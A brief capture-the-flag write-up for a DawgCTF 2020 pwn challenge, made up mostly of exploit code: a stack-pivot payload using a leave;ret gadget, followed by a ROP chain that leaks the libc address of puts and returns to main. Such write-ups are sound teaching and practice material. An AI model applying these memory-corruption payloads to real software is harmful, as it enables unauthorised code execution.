Tags: pwn stack_pivot rop
Rating:
satck pivot first, then use gadget `leave;ret` to entry ropchain
```
# stack pivot
payload = cyclic(12)
payload+= p32(ebp) # ebp
payload+= p32(0x080496d1) # return address
payload+= p32(0xdeadbeef) # padding
ru('So where we roppin boys?\n')
se(payload)
# rop1
ropchain = p32(elf.sym['puts'])+p32(elf.sym['main'])+p32(elf.got['puts'])
pl2 = ropchain
pl2+= p32(ebp-0xc-4) # ebp
pl2+= p32(leave) # return address
pl2+= p32(0xdeadbeef) # padding
se(pl2)
```
[more details](http://taqini.space/2020/04/13/DawgCTF-2020-Pwn-rop-Writeup/)
